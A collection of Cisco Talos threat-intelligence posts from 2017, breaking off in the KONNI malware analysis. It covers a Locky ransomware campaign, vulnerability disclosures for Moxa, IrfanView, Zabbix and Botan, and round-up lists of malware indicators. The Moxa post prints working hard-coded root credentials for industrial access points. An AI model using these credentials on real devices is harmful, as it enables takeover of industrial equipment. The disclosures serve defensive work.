Detection Screenshots

AMP

ThreatGrid

↧

Threat Spotlight: Mighty Morphin Malware Purveyors: Locky Returns Via Necurs

April 21, 2017, 11:42 am

≫ Next: Vulnerability Spotlight: Hard-coded Credential Flaw in Moxa ICS Wireless Access Points Identified and Fixed

≪ Previous: Threat Round-up for Apr 14 - Apr 21

This post was authored by Nick Biasini

Throughout the majority of 2016, Locky was the dominant ransomware in the threat landscape. It was an early pioneer when it came to using scripting formats Windows hosts would natively handle, like .js, .wsf, and .hta. These scripting formats acted as a vehicle to deliver the payload via email campaigns. However, late in 2016 Locky distribution declined dramatically largely due to the slowdown of Necurs that occurred at the same time.

On April 21st, Talos observed the first large scale Locky campaign in months from Necurs. This campaign leveraged techniques associated with a recent Dridex campaign and is currently being distributed in very high volumes. Talos has seen in excess of 35K emails in the last several hours associated with this newest wave of Locky. This large wave of distribution has been attributed to the Necurs botnet which, until recently, had been focused on more traditional spam such as pump-and-dump spam, Russian dating spam, and work-from-home spam.

Campaign Details

The campaign itself is similar to most spam campaigns Talos observes. There were several different emails associated with the campaign designed around payments/receipts or scanned images. Below are some examples of the emails that were observed.

Sample of Receipt/Payment spam campaign

As shown, there is no body in the email and the subject has several variants usually starting with "Payment" or "Receipt" and including several numbers. Some examples can be found in the IOC section of this blog. The filename itself also changes slightly but uses the naming convention beginning with the letter "P", followed by between 3 and 5 digits. One interesting aspect of this campaign is that the subject lines are only seen a couple of times before changing. The second portion of this campaign did not follow the same methodology.

This campaign used the same subject line for tens of thousands of messages. The attachment name was customized based on the email address used to distribute locky. These emails do have a typical body that would be associated with scanned image or document. This too included a malicious PDF.

Malicious Document

The technique used by the adversaries to deliver locky was just recently used to deliver Dridex and made use of PDF document with embedded word documents. These word documents then use macros to pull down the locky sample and encrypt files. There are a couple of interesting aspects of using this technique one of which is requiring user interaction to get the sample to run, defeating many sandboxing technologies. This is a sample of the PDF document.

As shown the document itself only has text referencing another file that is a series of numbers. Also notice the pop-up box requiring the user to click 'ok' in order for the file to be opened. In this case it was a .docm file that has the same filename that is referenced in the PDF.

The word document itself contains an XOR'd Macro that downloaded the Locky sample from what is likely a compromised website. After infection the Locky sample used the /checkupdate C2 structure that has been previously used by Locky.

Below is a graphic showing how the Locky campaign has led to a spike in DNS requests associated with the domain serving the malware. It's difficult to determine if these requests are from victims or the many security practitioners that are investigating this widespread campaign. Regardless it is obvious that this is the most traffic that particular domain has seen.

Infection Video

Below is a video showing the full infection chain from email to PDF and finally to Word Document leading to a successful Locky infection.

IOC

Hashes (PDFs)
ffebb94676c767fb2cbd86453e3127f7abf459c428f2d80228f2cd7e1b55fff3
ca5c4d2bb3c6c035bb0137504b17ccec31deb366757440feb832b7e0d270b487
44687edc7169d919ef0891e41487ddefa30d93744d6a9e3ecabb5d6f8d88c039
d6aa22aee572dd90161ba793b8afba27dbf50df4d23b2921d131626671e8d966
8476cf9307933499771186dfe4c397905ea2a320c488b357ba0148f862b9532e
1705d38d2ea80177963d67fd18e836326d70a239378d6b9c74d445c5e0b423d6
3ccef773a5527c7128987bb8d359726f0b3d4d84dd6526c1b3aa76fd98b68539
6eaeb3aa26dcce83342eb2ed055c623ae43c629eccd7f1d31c0380029ed9741d
65e5a0956b7e83e484b0fce962e08f1d75aefb0232d1521c97e186a746aabd2f
9008ee571b139496190f4e54d155300a1c875a8fb9096cfa27809e4e71955176
1b15c90d67e4b7522ca61e21133b155eb7f1cf32328a030784dc2d95ee7d10ad
32324fe312aba53c25a512eb81f7fe6ab7b2a44417a0cd0983c6f19cd29d5b26
1b025b5f24d42eed4eabaff15cee80fff3484d4205be2611f8dce5d4dce9020c
7e69993bfe292a72f8377d47059741f2b9ef2df1c93b2a0457ed8c1acf986e70
69ac4202505b603b490e5f2ca4e310af57a16c6c3f9a2efa928ab0d0faf7ae6b
1fc5a5831c2d880fc5e32db55adef8ad1e0f68b8e245ccaf1a3ee78f83a7da27
e4426738a8ed366f2773aa3ac9374dae6f3ad41759dd3227a8d025fac2af9b49
a0b01d5f3f41b49e07be198408910084912cc5db030aa4d0449a8bd2677596b3
06d42acee69178a161b7317c87515e4bdab647976985a1d172411b799ffbac32
eb9c6616204c358aa06ebb181cfcf8220216a9531b05006e8ed5dd714f3574da
7e73b086c5d0d693483a57847aa738e8c3b65b45f8603b5980721795af4534dd
7a6052881573bb7d976a5bbf39e1a9221dea68193f27c142bb77534a5049e5b9
f08ab6e0fc6dbff270b2d42f4412375cef3d543b311923960ab432d35754a56e
63fc82ce40ea946749e7312517b103fad96e8da6a01c63e44be93cd196aae692
2592d4bf18d83d1b9f98176ce389d6ad5dcaa399f3a549fab15cad520cd24470
5e9f7cae76f9888c732a77345326e442f56d94e8ed253eabb812fc2ba95e01ca
ff92433ae4ee90b3c6dd3cd5655302be345addd2a57bf143ee982e692ca7ca33
2881600b108ece9a1df3e7659370e3ee79cf233e9723a9acd7985452c5915eb3
f1326f8c348b6a4eb0fe0c3fcdc27e8375fd0ea7ecca54d392de790f31a9d037
cd0a031a65a10e8c549c29c1b5db87ad730c84ef9ba48041b3c4a723e56ee71f
8e2cb05dbf3375e66488f387aaebe31c51c95fea135eadace186362629988a4c
0559d32f6a20cdfa380eb1eb17fbc4aea9e39f3203f4b7818281e0fb117a6977
32325761402e0b55dd9fe8b2718bc213491eea6f57bc354e358a6edcbe584dd1

Hashes (Word Docs):
026fa1191fcf895ce375ad8f8f2bda47aa8b1cb27e6be490399a1ad47d452b68
a20ebaf8b9c14a2738795f0c38b48a712f3e9fd293a51c5475b15c959856139d
04ea10db95049ec292e712803dc87c236cc3e3e7c2dd018e84d841f9060a15ef
aa09f65734b2b6972b47b8845aa8f59737ab5a6b5469d7a6e6fdbcf12629b287
0af35bd7ffe0af328cff2cf39585b4b1b69d550c94f0b407e348085dda0b4284
ad022ea9c0bbc852806e87f8b1a2d4ffd683116876304613160e975f430bd992
10ce87f33381989373c519e2ff539f86c2a0a2a4cab0b791e82d4afece0367e6
b0ad3d8fade247b219d7a3c8fee781e26742c1733de8c00cc50254785cb71e09
1d73ce6cbc40b02c59c928238f1d316b4340c4ac1e0231f608fa7b5d2fb24836
b27fb67c5a86f65c762a8af7537c8c5d5fc27e3e2f600495d22cd39fbe82018b
24982da99435dd1a12c1a7bda53e7325b5081dff96b441287a99027a6b379309
b78dcbf395b7c934344e4f1bb3cb08628455e8d2a997dbad0bce7afdd573ff8e
2665260758371f88ca4e49dd577e885fc138651a0e2b3564309b892eea36f7af
276fd3e1e484996c7f2cd8d9b9d0125dc0d9d6488a65417fb80662616b76adc2
c411f18d2d53f26dad5275a549d288447a492487b46379fe07087f42792a1be1
2cc4ca03a31e970a020bc85bb797847abaae41af7c0734826213b4938e5040cb
c7dc067b3e6ba29ffbfc45d9c32219f3e6898142dfc6da374c752b0bc0fb4c01
350e989a917614bc2f830dbe61cbad08b444d9cfe96706ed0bd2d86e3a586ec4
d38ba2dfc9e02a2c6997901aae2197402ce7cf3e79973b81dd06271dbac17328
3a9cbdb511a5c3fad3f3d6eedaf0fe7aa61bd362d374aa8b0e7924ea1a07be48
dfb72c342d42655c6309a7496acdad721d7ab1b171e90eaef8b676ac99a06461
486a3f4053c1e44cb09a43d645227b4916a6475658f3e21ee02bae66df6a8667
e0f9cca4d7acda468bf1e8f0fab70f4b95b37cc711dae3d972aaf0c4bb0dabc6
52db4cca867773fdce9cd8d6d4e9b8ea66c2c0c4067f33fd4aaf6bfa0c5e4d62
e4ec3cdf1bb578d2740c06a0e615f4b2f08ce1ff6f925670a92630fc3daedda1
65184fbf32ef6a9e109115aaac401de7c0af797d485396091f284a262abf222c
e67599948a41876b59f09af447816391fd5d29fdebaa5b1fc344980c0b13574b
6f354a86af7f1885935f0214e663734479e560784c257fa006030fb64d9f38bb
eb822fb0d99a0b8aefcf70e484b997979a4a4c22325dfd52c4bec492e9937a03
750c0fdd43575e5110fe348f8fc46f5e5413b0e1aed1c3547bb2e216255e4f00
edb73979f8d857a35f0be95538db9bc33bc583021feca81c1a64f2da18a902d3
8424b5178273e0b5d17ae34a1bf3889b1e1d4a351246d342cad933e1e5ec7779
ee4adfcfc84afbde6180495e132a5477c8d48739051db7d996e078b33c1a5e45
8b178a3e113a14ebb0e288d610540b15df9a3c59f72667d7142782fd3ef9f370
f175ed80e667d31877ad75117f2e98a2fb83eeec8f5a523d9ed10ae6fc2dc453
8bb3c9df22203fadd942b4a4820219f88e20833f9f33ff9ae0361074dc3786f3
f3877a6e45463ebfa03b49087852572793e4233d084a64584e29f6b7c83af1e8

8e508ea5009677860b67e34af22f6706e6aa1e94c84759a43b1c9f3e40dbe013

Subjects Observed:
Scanned image from MX-2600N (Largest scale with single subject)
Receipt (Variants include mix of characters like - or _ and a series of numbers i.e. Receipt#25088)
Payment (Variants include mix of characters like - or _ and a series of numbers i.e. Payment-7084)
Payment Receipt (Variants include mix of characters like - or _ and a series of numbers i.e. Payment Receipt_67467)

Conclusion

Ransomware's monetary draw has continued to push it to the forefront of the threat landscape. Locky had prolific distribution for the majority of 2016, but has been largely absent for 2017. This could be the first significant wave of Locky distribution in 2017. The payload hasn't changed but they methodology has; the use of PDFs requiring user interaction was recently seen by Dridex and has now been co-opted into Locky. This is an effective technique to defeat sandboxes that do not allow user interaction and could increase the likelihood of it reaching an end user's mailbox.

Adversaries will continue to evolve to try and maximize their profits. This is just another example in a long line of evolution that email based malware delivery has gone through. For a time PDF based compromise was down significantly and word macro based compromise up. In this campaign they figured out how to disguise a macro laden word doc in a PDF, compromising victims around the globe.

Coverage

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

↧

Vulnerability Spotlight: Hard-coded Credential Flaw in Moxa ICS Wireless Access Points Identified and Fixed

April 21, 2017, 2:59 pm

≫ Next: Vulnerability Spotlight: IrfanView Jpeg2000 Reference Tile width Arbitrary Code Execution Vulnerability

≪ Previous: Threat Spotlight: Mighty Morphin Malware Purveyors: Locky Returns Via Necurs

Earlier this month, Talos responsibly disclosed a set of vulnerabilities in Moxa ICS wireless access points. While most of the vulnerabilities were addressed in the previous set of advisories, Talos has continued to work with Moxa to ensure all remaining vulnerabilities that Talos identified are patched. Today in coordination with Moxa, Talos is disclosing the TALOS-2016-0231, a hard-coded credential vulnerability that could allow an attacker to gain complete control of the device. Moxa has released a software update to address TALOS-2016-0231 and other bugs.

Vulnerability Details

This vulnerability was identified by Patrick DeSantis of Talos.

TALOS-2016-0231 (CVE-2016-8717) is a hard-coded credential vulnerability within Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client devices. An undocumented, root-level account with hard-coded credentials exists in these devices with no mechanism to disable or remove the account permanently. An attacker could leverage this account and gain complete control of the device remotely.

The following are the hard-coded credentials:

Username: 94jo3dkru4
Password: moxaiwroot

In the event patching is not possible, it is recommended that you disable remotely-accessible services, such as SSH and Telnet.

Talos has written Snort rules to detect attempts to exploit the vulnerability. Administrators should be aware that these rules are subject to change pending new or additional information regarding this vulnerabilities. For the most current information, we recommend customers review their Defense Centers or visit Snort.org.

Snort Rule: 40758

To view this and other vulnerabilities Talos has disclosed, please visit to our Vulnerability Report Portal:
http://www.talosintelligence.com/vulnerability-reports/

Our Vulnerability Disclosure Policy is also available here:
http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html

↧

Vulnerability Spotlight: IrfanView Jpeg2000 Reference Tile width Arbitrary Code Execution Vulnerability

April 26, 2017, 7:03 am

≫ Next: Vulnerability Spotlight: Multiple Vulnerabilities in Zabbix

≪ Previous: Vulnerability Spotlight: Hard-coded Credential Flaw in Moxa ICS Wireless Access Points Identified and Fixed

Discovered by Aleksandar Nikolic of Cisco Talos

Overview

Talos is disclosing TALOS-2017-0310 / CVE-2017-2813, an arbitrary code execution vulnerability in the JP2 plugin for IrfanView image viewer. IrfanView is a widely used, Windows based, image viewing and editing application.

This particular vulnerability is in the jpeg2000 plugin (JP2) for IrfanView resulting in an integer overflow which leads to a wrong memory allocation and eventual arbitrary code execution. This vulnerability is specifically related to the way in which the plugin leverages the reference tile width value in a buffer size allocation. There are insufficient checks being done which can result in a small buffer being allocated for a large tile. This results in a controlled out of bounds write vulnerability. This out of bounds write bug can be further leveraged to achieve code execution in the application. This vulnerability can be triggered by either viewing an image in the application or by using the thumb nailing feature of IrfanView. The full details surrounding the vulnerability are available here.

An updated version of the plugin is available here.

Coverage

Snort Rule: 42177,42178

↧

Vulnerability Spotlight: Multiple Vulnerabilities in Zabbix

April 27, 2017, 7:45 am

≫ Next: Vulnerability Spotlight: Randombit Botan Library X509 Certificate Validation Bypass Vulnerability

≪ Previous: Vulnerability Spotlight: IrfanView Jpeg2000 Reference Tile width Arbitrary Code Execution Vulnerability

These vulnerabilities were discovered by Lilith Wyatt of Cisco ASIG

Summary

Zabbix is an enterprise monitoring solution that is designed to give organizations the ability to monitor the health and status of various systems within their networks, including: network services, servers, and networking equipment. Cisco recently discovered multiple vulnerabilities in the Zabbix Server software component that could be leveraged by attackers to write directly to the Zabbix Proxy database or achieve remote code execution on the Zabbix Server. Cisco worked with Zabbix to responsibly disclose these vulnerabilities and ensure that a patch is available. Zabbix has released public advisories regarding these vulnerabilities which are located here and here.

Vulnerability Details

Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability (TALOS-2017-0325 / CVE-2017-2824)

By default, Zabbix Server exposes a series of APIs to Zabbix Proxy which are responsible for discovery and configuration tasks which are created and executed based on information provided by the Zabbix Proxy using this API. The existence of a command injection vulnerability in the "discovery" requests associated with these APIs could allow an attacker to insert arbitrary commands into the Zabbix database. The injected commands inserted by the attacker can then be executed by sending an appropriate <command> request specifying the <hostid> associated with the record that was previously created. This could allow an attacker to achieve remote code execution on the Zabbix server.

For full details regarding this vulnerability, please see the advisory here.

Zabbix Proxy Server SQL Database Write Vulnerability (TALOS-2017-0326 / CVE-2017-2825)

When configured in active proxy mode, the Zabbix Proxy will send "proxy config" requests to the Zabbix server on startup, as well as during regular intervals. The Zabbix server responds to these requests by transmitting the proxy configuration in an unencrypted state. While the Zabbix server uses a hardcoded list of database table names to create the proxy configuration, the Zabbix proxy does not utilize such a list or any validation on the response received from the server. An attacker with the capability to perform a man-in-the-middle (MITM) attack against this communications channel could maliciously manipulate these responses, thus allowing the attacker the ability to write to the database on the Zabbix proxy.

For full details regarding this vulnerability, please see the advisory here.

Affected Versions

The following software versions are listed as confirmed affected in the advisories released by Zabbix:

Zabbix 2.4.7 - 2.4.8r1

Conclusion

Cisco worked to responsibly disclose these vulnerabilities to Zabbix. Zabbix has released public advisories regarding these vulnerabilities. These advisories can be found here and here. As this vulnerability can be leveraged by an attacker to obtain remote code execution on affected systems, it is recommended that the applicable security updates be applied as quickly as possible. Ensuring that systems remained patched against the latest software vulnerabilities is essential to ensuring that environments remain protected.

Research efforts to identify zero-day vulnerabilities in software will remain an ongoing effort by Talos. Our work in developing programmatic methods to identify zero-day vulnerabilities and making sure they are addressed in a responsible manner is critical to improving the overall security of the internet.

Coverage

The following Snort IDs have been released to detect this vulnerability: 42326, 42337.

Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Defense Center or Snort.org.

For further zero day or vulnerability reports and information visit:

http://talosintelligence.com/vulnerability-reports/

↧

Vulnerability Spotlight: Randombit Botan Library X509 Certificate Validation Bypass Vulnerability

April 28, 2017, 7:22 am

≫ Next: Threat Round-up for Apr 21 - Apr 28

≪ Previous: Vulnerability Spotlight: Multiple Vulnerabilities in Zabbix

This vulnerability was discovered by Aleksandar Nikolic of Cisco Talos.

Overview

Talos has discovered a vulnerability in the Randombit Botan library. A programming error exists in a way Botan library implements x500 string comparisons which could lead to certificate verification issues and abuse. A specially crafted X509 certificate would need to be delivered to the client or server application in order to trigger this vulnerability. A security advisory was published on the Randombit website to inform users the vulnerability is now fixed in versions 2.1.0 and 1.10.16.

TALOS-2017-0294 (CVE-2017-2801) Randombit Botan Library X509 Certificate Validation Bypass Vulnerability

Details

X509 Certificate Validation Bypass Vulnerability

The vulnerability is located in the function that Botan uses to parse the x509 distinguished name. More particularly in the equality comparison function `Botan::x500_name_cmp`. The vulnerability is located in the way of the white spaces are handled. A crafted x509 certificate with specific x509 DN strings for subject and issuer fields can be created.

With careful control over X509 distinguished names contents and depending on memory layout in the target application, it could be possible to craft a certificate where equality checks could pass or fail. This vulnerability can be exploited to fool systems into connecting to unauthorised computers. This can be abused to conduct man-in-the-middle attacks, or to trick systems to connect to a malicious server.

More details can be found in the vulnerability report:

TALOS-2017-0294

Tested Version

Randombit Botan 2.0.1

Coverage

↧

Threat Round-up for Apr 21 - Apr 28

April 28, 2017, 1:36 pm

≫ Next: KONNI: A Malware Under The Radar For Years

≪ Previous: Vulnerability Spotlight: Randombit Botan Library X509 Certificate Validation Bypass Vulnerability

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 21 and April 28. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Doc.Macro.MaliciousHeuristic-6298845-0
Office Macro
Office macro code is used to further compromise a target system. Macros can leverage external system binaries to execute other binaries to further compromise the system. This signature looks for code associated with hiding the core functionality by including junk code.
Win.Dropper.DarkComet-6301230-0
Trojan/RAT dropper
This is a malware dropper. It currently drops the DarkComet RAT. The file is a slightly modified version of wextract.exe, a legitimate Windows tool to unpack archives. The malware payload is stored in the resource section of the binary. The dropper binary is actually a multi-format file, and can be interpreted both as a PE executable as well as a cab archive. The modified Windows binary will extract the payload binary from itself and run the extracted file.
Win.Trojan.ServStart
Trojan
ServStart is a trojan that installs a persistent service on the victim’s machine. The service exfiltrates information about the infected computer including machine name, username, keyboard language, and computer performance specifications. The malware server can respond with commands to download and execute files, or execute shell commands. ServStart has been observed using multiple dynamic DNS providers for its command and control infrastructure.
Win.Trojan.Agent-6298180-0
Trojan (credential stealer)
This sample attempts to collect stored credentials from a number of installed applications and then attempts to transmit those credentials back to a PHP application on a possibly compromised server.
Win.Trojan.PWS-6299789-0
Password stealer, injector
PWS (also known as Fareit or Chisburg) is a credential & sensitive information harvester. Select information such as banking credentials or web browser password databases are queried for on the infected host. Any discovered data is propagated to a C2. These recent samples are protected with the Armadillo packer & rely on both code injections & dropped VBScript code.
Win.Dropper.Emotet-6301061-0
Dropper
This dropper is delivered through different mechanism, most of the time the victims is redirected to a website to get it through malicious pdf, http iframe injected. Once running on the computer the binary is gathering details on volume disk drive and other details, injecting process, dropping itself and contacting internet to execute more. Websites observed delivering ransomware and trojan banker.

Threats

Doc.Macro.MaliciousHeuristic-6298845-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

storefronts[.]pl

File Hashes

23b90b1c55fdbbd371655da0ccf359e891deb51ed5bbc0ac772c5d572f4b3a42
2471636a92daa0a54095aa66b55ad2fea5fd5d6372b0be9d65d1d1e2cef31bd5
2b24221aabc8cd18e756a579b29a005fc9c33213f5ec963b9b6ccf4e6187b23b
4b781b8370f973b9204b44c8ce3615692fc66c1613967a44924984d35fba7bc4
4ee6b9bb8e903bed9a82c7dad6d62163e3a4f759ade5f5f8fcf899945bfd9264
564c37dcd8322bd6e8cabc788f982a35f7d3e335c3d736ce544fc17a6b090183
59b54e7c4e052adbc1d64dc61623af6f55db1a8692b373cb6ca871ba087feaac
6930d456c506c94b9e19a08659181b7d376254dca652d0e56c305764867578d2
6a0eae0addd6ce84966ac1bd006e9582036eaaa1011a38190f700871cc37de24
7045d8f339cab73cf0ec7f31a7b3a31a84057f0b275f789f4bfed9dffee35564
7638745d08de218fa16e9c0828ed0a1139223d3ebddf4bb528bc3ae185cea90e
81cdded9aa21513ad9c6ae04455a7fce68129135f3358b9c5e28a80139e78f21
93472e054b4b4fcc54a71a32b6275f8b35c8ef84490248d21c094f19a537c773
a0bfeb90468ddf50a3c85d5074e002b1d89995d6377eceeb0781ba5292facbcc
b3dfdfcfea160ed34eb69da55909294f78d2b5a6320cbf5151a3da01c6449631
c185559d0a38e782167beacff78a7a72544d82890b5e5723e6a25a70e6e16d59
d2c1b89129e3e26544bfbef3fac4567c3629817a98ded9ce5c7dee485d0364a9
f2e4fe273c4a8cc1cd7799d5558c58b8a08dfe160235dfa2eb2a8bad9bba40aa
02481825e922c38ba797ebc18d5a8273ede8c5a4d52eecd2f58eb569533d780b
06736e5f3127a54bbe6bb25f4a82ca95371e5cc8654a893c02d3d4e677e0b916
21b039f3171f26911290dad3e1ce0da6d6d3545e11f9a119408922ac2ae06db6
2643f9f8dce45983eac80feeebd16adbd498e3a644ef8b05bc40448be9342ddf
2ac6b5487c69427476b48bcbbddd7646842e02363a0d4ebe1b1998da6d1f55a8
2dad87b69ee91bfa71d911b791e5468efb6ce689ccc4cde3e91626cbfcfc14ab
2f4853b54c36adf9ca9fbb163dacedee78b6b027fac3c24c72120e9d8cc6f01e

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Malware

Win.Dropper.DarkComet-6301230-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

File Hashes

05C8DE4B97737440913F5C714082AD647281FA50F1904B1BF11EDB8560294FAC
07D9D6DA8C6CD162DD9FC78AC48EAF82BC49D4239908AF354E44C4822FE06D62
099ADD24586D77C5F2B8EFB9C33A8A11B5A0C11001A8534D9635A674ADC260AD
0A155F4F20367E4D23B6D238208FA5F943A1341E47BDBB2DBC520CCB27AD120B
150420EDB4BF00DADCF71601781DBE3BD6E34CBA767153B9F82307EDDF391395
15F2BB3B4A12A6F5B0965FDE62AE21B2796D7659BBA8011FC22AF40D465984BE
318B2A4F06345E95C63E4623F52E0E7C57257548C74E0C7A272FCB64D3F49692
4B0BB06E09ED0B2EDB085641E125490E9B1A6CC5652C05C77C78E47CF9448D35
507874BA705282183F928D3AE11ED5497A0F1EAC3368DE75C392D17749CB8EE9
55FDFC65C0C10A958239E0447E5696989FE66557437EB725849BB578D882D74E
5D31C073C4B7322A7DE871D533D520DE2444466D0C944CB06F6244D2CE57D49D
6597E2DD82FC203BA2C609B358B2E0CAE37A4309808626DA27BD58614077D646
6A23031FDD70C6D57D8FE9C8D3EFE6A423C38BF2D46B9B24959E5CA7D0714FCA
6C652B0E4998456F150515EBF50CA569CF373BA709442F6909DD7D4330C83D2E
6EB12C46F0605D8F915C8E895FC70D189D9E8825775EBDB464A9A24834887E60
776B2679819B1E0385E1630EEEC50190DAAAEC0EEF9F659EE728C47991FABFBB
77FA104262E3FF983B3418540FF744E0EAAE5E66388333ED785EF6F5AA2801F9
7D6765A1F6589A554457D9363F702F65E81DDDA52EB62C600250E0F94C473A16
8590486CD299DAA9BF42497EF28028364E4E18B6C60B725736A7D2DDC73BBC2F
92EABA06563800BA670249E90D91C32F9D315889439BCAA73F24D2C08E285B84

Coverage

Detection Screenshots

AMP

ThreatGrid

Win.Trojan.ServStart

Indicators of Compromise

Registry Keys

HKLM\SYSTEM\CONTROLSET001\SERVICES\NATIONALLWC\Description
"Providesufl a domain server for NI security."

Mutexes

Nationallwc

IP Addresses

Domain Names

syhaw1516.codns[.]com
wrop0422.codns[.]com
ansbase.9966[.]org

File Hashes

fbbc6852ff1947fcd820b90e60ab71af93ffad079bd13a0d2b514955bb1c9d62
40eddfac964b69ee2e26742faaacfe50960fa0232a1b9a11c382e61cecd700ff
6106eda3ae39449fec42db2caf4f1b5f994d72b5a759dddfd77a8a29ebb3f497
c106435a2aced27d03ee5531eda025b14cec106106a1c7ca750127090f6d2039
8d4366eff17da1c18ab3fed1692628756a8f41f3145877f895b7ef950055262f
3be7ab79f032cf24b09fc05b08544fd61ec7e3fd355f8ab7b4580eb43d8c3e55
ff6b7320d6b75a638c0f2d024f43853dd78993276a8f6b5f7463d6317858dd9c
c9a193d273f606860bee0dd4a878a6421233b05ac4c6faf357d9324f0d6a575a
932d8d5829570237e9ab7688dd2d3c03812a05157f72af124cabf530be583789
ba07a79a2f4d51eaac585b0f50e3b1e61d8fc555592aadb1e5d3916fb26b0e27

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Win.Trojan.Agent-6298180-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

212.129.14[.]211

Domain Names

tranexestin[.]com

File Hashes

afc3ba4941b89a4467e2f1a4ab0df2c88ef5e39264182a4b3a2dbbfa5b022e3f

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Win.Trojan.PWS-6299789-0

Indicators of Compromise

Registry Keys

USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\MACHINE\Software\Wow6432Node\Microsoft\Tracing
\MACHINE\Software\Wow6432Node\Microsoft\Tracing\tmpVtFw4a_RASMANCS
USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft
USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\Visual Basic\6.0
\MACHINE\Software\Wow6432Node\Microsoft\Tracing\tmpVtFw4a_RASAPI32
USER\S-1-5-21-2580483871-590521980-3826313501-500\Software
USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
USER\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\Visual Basic
USER\S-1-5-21-2580483871-590521980-3826313501-500\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2

Mutexes

IP Addresses

92.53.96[.]120

Domain Names

cv42569.tmweb[.]ru

File Hashes

dddde27836842e0f950b5622e1be7a0f51072db573b2f2e41d20d4b4c45028d8
dc086f745c35b2abe58675e546b475ed64f15ea6e9d4492a0502476f784ea85c
97cd05c529002b85ae756a9e7b7da7a538026583f0886a235cf48b72c378551a
2992c6ce7ccda6fef751a912eafb8a31e3426bde8964ccf31b0512390bd61615

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

Win.Dropper.Emotet-6301061-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

188.165.220[.]214

Domain Names

File Hashes

f566fdc382f6988599cb16894d8a9a92e291d83574834de705d6367b520b6b50
dda1fffa38e3f9d30833d201b542422aed15a41253b2a72797ad38dfba8fe535
6d4fa878e2930cb3bedc2078855f6d7db7b6b136464f6dff256d8c62657b505f
8ad1c1655d6d3b2a4931ae2dd9eb4e3b7be488a7f39b9c396fe1eeda2eda05a7
c0e8a92ba6ce12d803ecfccd01432f855e6fd9ad19825602a74a081459e25389
5598fdcc6c0c2e7bdb095193a5f986e6cf22fdcca26c2e8451c46d787ef18435

Coverage

Detection Screenshots

AMP

ThreatGrid

Umbrella

↧

KONNI: A Malware Under The Radar For Years

May 3, 2017, 9:59 am

≫ Next: Gmail Worm Requiring You To Give It A Push And Apparently You All Are Really Helpful

≪ Previous: Threat Round-up for Apr 21 - Apr 28

This blog was authored by Paul Rascagneres

Executive Summary

Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI.

Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .src file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:

at the beginning the malware was only an information stealer without remote administration
it moved from a single file malware to a dual file malware (an executable and a dynamic library)
the malware has supported more and more features over the time
the decoy documents have become more and more advanced
The different versions contain copy/pasted code from previous versions. Moreover the new version searches for files generated by previous versions. (This implies that the malware has been used several times against the same targets)

This evolution is illustrated across 4 campaigns: one in 2014, one in 2016 and finally two in 2017. The decoy document of the 2 last campaigns suggests that the targets are public organisations. Both documents contained email addresses, phone numbers and contacts of members of official organizations such as United Nations, UNICEF, and Embassies linked to North Korea.

3 Years Of Campaigns

2014 Campaign: Fatal Beauty

In this campaign, the dropper filename was beauty.src. Based on the compilation date of the two binaries, this campaign took place in September 2014. Once executed, two files were dropped on the targeted system: a decoy document (a picture) and a fake svchost.exe binary. Both files were stored in "C:\Windows". The picture is a Myanmar temple:

The fake svchost binary is the KONNI malware. The first task of the malware is to generate an ID to identify the infected system. This ID is generated based on the installation date of the system, as found in the registry (HKLM\Software\Microsoft\Windows NT\CurrentVersion\InstallDate). The second task of malware is to ping the CC and get orders. The malware includes 2 domains:

phpschboy[.]prohosts[.]org
jams481[.]site[.]bz

The developer used the Microsoft Winsocks API to handle the network connection. Surprisingly, this isn't the easiest or the most efficient technical choice for HTTP connection. The malware samples we analysed connected to only one URI: <c2-domain>/login.php.

This version of KONNI is not designed to execute code on the infected system. The purpose is to be executed only once and steal data on the infected system, here are the main features:

Keyloggers
Clipboard stealer
